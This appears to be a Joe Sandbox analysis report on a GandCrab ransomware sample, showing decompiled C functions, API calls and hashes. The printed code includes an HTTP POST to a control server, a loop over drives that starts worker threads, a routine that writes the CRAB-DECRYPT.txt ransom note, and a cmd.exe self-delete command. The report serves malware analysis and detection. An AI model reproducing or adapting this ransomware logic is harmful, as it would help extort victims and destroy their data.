				_v20 = __edx;
				_v12 = __ecx;
				E0F697E40( &_v28);
				_v16 = E0F695220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xf69fb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xf69fb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xf69fb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xf69fb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xf69fb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xf69fb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0F698050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0F6953D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

0x0f6954f8
0x0f6954fa
0x0f695501
0x0f695504
0x0f69550f
0x0f695525
0x0f69552c
0x0f695542
0x0f695546
0x0f69554b
0x0f695558
0x0f695558
0x0f69555a
0x0f69555e
0x0f695564
0x0f69556d
0x0f695572
0x0f69557a
0x0f69557f
0x0f695587
0x0f69558c
0x0f695594
0x0f695599
0x0f6955a1
0x0f6955a6
0x0f6955ae
0x0f6955b3
0x0f6955bc
0x0f6955c5
0x0f6955c9
0x0f6955ca
0x0f6955d2
0x0f6955d7
0x0f6955e1
0x0f6955e2
0x0f6955e3
0x0f6955e9
0x0f6955ee
0x0f6955f6
0x0f6955fc
0x0f695601
0x0f695609
0x0f695617
0x0f695627
0x0f695619
0x0f695619
0x0f69561e
0x0f695623
0x0f695623
0x0f69561e
0x0f695617
0x0f695601
0x0f695637
0x0f695643
0x0f69564d
0x0f69564f
0x0f695654
0x0f695657
0x0f695657
0x0f695665
0x0f695665
0x0f69554d
0x0f695552
0x00000000
0x0f695554
0x0f695554
0x00000000
0x0f695554

APIs

Part of subcall function 0F697E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F698024
Part of subcall function 0F697E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F69803D

Part of subcall function 0F695220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F695288
Part of subcall function 0F695220: Sleep.KERNEL32(000003E8), ref: 0F6952C5
Part of subcall function 0F695220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F6952D3
Part of subcall function 0F695220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F6952E3
Part of subcall function 0F695220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F6952FF
Part of subcall function 0F695220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F695310
Part of subcall function 0F695220: wsprintfW.USER32 ref: 0F695328
Part of subcall function 0F695220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F695339

lstrlenA.KERNEL32(00000000,00000000,00000000,74CB6980), ref: 0F695512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F695532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F695544
lstrcatA.KERNEL32(00000000,?), ref: 0F69555E
lstrlenA.KERNEL32(00000000), ref: 0F6955B3
lstrlenW.KERNEL32(?), ref: 0F6955BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F6955DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F695637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F695643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F69564D
InternetCloseHandle.WININET(0F69581B), ref: 0F695657

Strings

popkadurak, xrefs: 0F6955E9
POST, xrefs: 0F6955CA

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: f81ccd06c5b7fb3f29e067eb8275b518abd54685ad1c9403dc4aacd27f41144e
Instruction ID: 57de55d98b69eb3b921a10b422c51032a91a712835e0eab624c98f27132774dc
Opcode Fuzzy Hash: f81ccd06c5b7fb3f29e067eb8275b518abd54685ad1c9403dc4aacd27f41144e
Instruction Fuzzy Hash: 8341E271D0830AA6EF119FA8DC41FEE7BBCFB89711F101115EA00F2241EB796A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0F6972A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F6972A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0f6972a0
0x0f6972a8
0x0f6972aa
0x0f6972ae
0x0f6972b3
0x0f6972c1
0x0f6972c4
0x0f6972c9
0x0f6972c9
0x0f6972cf
0x0f6972d9
0x0f6972e0
0x0f6972e4
0x0f6972e7
0x0f6972e7
0x0f6972ed
0x0f6972fb
0x0f6972fd
0x0f697305
0x0f697308
0x0f697308
0x0f69730e
0x0f69731c
0x0f69731e
0x0f697326
0x0f697329
0x0f697329
0x0f69732f
0x0f69733d
0x0f69733f
0x0f697347
0x0f69734a
0x0f69734a
0x0f697350
0x0f69735e
0x0f697360
0x0f697368
0x0f69736b
0x0f69736b
0x0f697371
0x0f69737f
0x0f697381
0x0f697389
0x0f69738c
0x0f69738c
0x0f697392
0x0f6973a0
0x0f6973a2
0x0f6973aa
0x0f6973ad
0x0f6973ad
0x0f6973b3
0x0f6973b5
0x0f6973b5
0x0f6973bc
0x0f6973ca
0x0f6973cc
0x0f6973d4
0x0f6973d7
0x0f6973d7
0x0f6973e0
0x0f69740c
0x0f6973e2
0x0f6973e8
0x0f697406
0x0f697406

APIs

lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972F2
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972FD
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697313
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69731E
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697334
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69733F
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697355
lstrlenW.KERNEL32(0F694B36,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697360
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697376
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697381
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697397
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973A2
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973C1
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973CC
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973E8
lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973F6

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 4c46aec1873c7b2d1928e3a43c4e514ccb7fc49fa0599a58ddca46feb39531fd
Instruction ID: 09351b5fa7c7291d50446bca88dd2b44a70ba6fc1d3ef132af7df5f3e628ed8d
Opcode Fuzzy Hash: 4c46aec1873c7b2d1928e3a43c4e514ccb7fc49fa0599a58ddca46feb39531fd
Instruction Fuzzy Hash: 2B411F32104652EFCB125FB9DE8C794B7E5FF0432AF085639E41682A21D776B478DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0F695F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0F695F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xf6a2a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0F699170( &_v267, 0, 0xff);
					E0F695DC0( &_v268, _t31, lstrlenA(_t31));
					E0F695E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

0x0f695f09
0x0f695f1b
0x0f695f1e
0x0f695f20
0x0f695f29
0x0f695f2d
0x0f695f38
0x0f695f40
0x0f695f49
0x0f695f6c
0x0f695f72
0x0f695f75
0x0f695f81
0x0f695f8b
0x0f695fa3
0x0f695fb3
0x0f695fc3
0x0f695fc3
0x0f695fd0

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F695F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F695F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0F695F49
lstrlenA.KERNEL32(00000000), ref: 0F695F54
wsprintfA.USER32 ref: 0F695F6C
_memset.LIBCMT ref: 0F695F8B
lstrlenA.KERNEL32(00000000), ref: 0F695F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F695FC3

Strings

ntdll.dll, xrefs: 0F695F33
%Xeuropol, xrefs: 0F695F66
RtlComputeCrc32, xrefs: 0F695F43

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: 4b53f5fbc8313ff3b8b607595e40fbf071fc5a34dad60cbb610c061b30c2038c
Instruction ID: 5b72f979080679f926ae0464c339b4994f6dad1b961af569342f8264b84b992f
Opcode Fuzzy Hash: 4b53f5fbc8313ff3b8b607595e40fbf071fc5a34dad60cbb610c061b30c2038c
Instruction Fuzzy Hash: 4E110435A4C304BBDF215FA8EC49FAE7BFCEB44721F140068F905E3281DAB96950CA55

Uniqueness

Uniqueness Score: -1.00%

Function 0F696D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F696D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xf6a2a64; // 0xf6a2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xf6a2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0f696d5b
0x0f696d63
0x0f696d85
0x0f696d8a
0x0f696d9e
0x0f696da5
0x0f696dbe
0x0f696dbe
0x0f696dc5
0x0f696dcb
0x0f696d8c
0x0f696d99
0x0f696d99
0x0f696dd8
0x0f696de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F696E22,00000000,?,?), ref: 0F696D55
wsprintfW.USER32 ref: 0F696D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F696D7F
GetLastError.KERNEL32(?,?), ref: 0F696D8C
lstrlenW.KERNEL32(0F6A2000,?,00000000,?,?), ref: 0F696DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F696DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0F696DC5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F696DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0F696D5D

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: b5a05d61b3eb801ba6d4f56494f747e245a26ae4213607492b67a3f56cb13a77
Instruction ID: 19faa58b32ce1e7233de5b669d0fe31f5fd3e20c714b22db6d4df4c7098f769f
Opcode Fuzzy Hash: b5a05d61b3eb801ba6d4f56494f747e245a26ae4213607492b67a3f56cb13a77
Instruction Fuzzy Hash: B101B5353883107BF7201FA4ED8AF6A369CDB45B26F101220FB05E51C0DBAE69258669

Uniqueness

Uniqueness Score: -1.00%

Function 0F695350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F695350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0f695376
0x0f69537a
0x0f69537e
0x0f695388
0x0f695390
0x0f695399
0x0f6953b3
0x0f6953b3
0x0f695390
0x0f6953bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F6954E9,00000000,?,?,?,?,0F695615,00000000,popkadurak,00000000), ref: 0F695366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F695378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F695388
wsprintfW.USER32 ref: 0F695399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F6953B3
ExitProcess.KERNEL32 ref: 0F6953BB

Strings

cmd.exe, xrefs: 0F6953A7
/c timeout -c 5 & del "%s" /f /q, xrefs: 0F695393
open, xrefs: 0F6953AC

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 486a0401abb72745a445360d0d6b3f58ce51461f09150c993b13b6184c92c8ed
Instruction ID: 8b2f96cda2105c6485ec02ffd8e6e824b3c154b78f3cbfcda1e680474b54db3e
Opcode Fuzzy Hash: 486a0401abb72745a445360d0d6b3f58ce51461f09150c993b13b6184c92c8ed
Instruction Fuzzy Hash: DCF01C317C971073F6212AA45C0BF572E9CDB85F26F250005B705FE1C295E6641186A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F692C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F692C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf69f290; // 0x21
				asm("movdqu xmm0, [0xf69f280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F692AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0f692c59
0x0f692c5e
0x0f692c66
0x0f692c69
0x0f692c70
0x0f692c76
0x0f692c79
0x0f692ce9
0x0f692cf2
0x0f692d01
0x0f692c7b
0x0f692c7e
0x0f692c9f
0x0f692cbd
0x0f692ccb
0x0f692cd7
0x0f692c80
0x0f692c94
0x0f692c94
0x0f692c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0F692C8A
BeginPaint.USER32(?,?), ref: 0F692C9F
lstrlenW.KERNEL32(?), ref: 0F692CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F692CBD
EndPaint.USER32(?,?), ref: 0F692CCB
CreateThread.KERNEL32 ref: 0F692CE9
DestroyWindow.USER32(?), ref: 0F692CF2

Strings

GandCrab!, xrefs: 0F692C5E

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 2f32b33dceca071399cca000b01b96a8aa79789b6104d5ca2448285e32ebf055
Instruction ID: b5a29c0dbe23c5ffcd980baf32d09d073af2af3785a3fdb864f0c36cd6074d52
Opcode Fuzzy Hash: 2f32b33dceca071399cca000b01b96a8aa79789b6104d5ca2448285e32ebf055
Instruction Fuzzy Hash: C311B232108209BBD711DFA8ED09FAA7BACFB48322F001616FD41D6190E7729930CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F693FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F693FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf69f350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F696F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
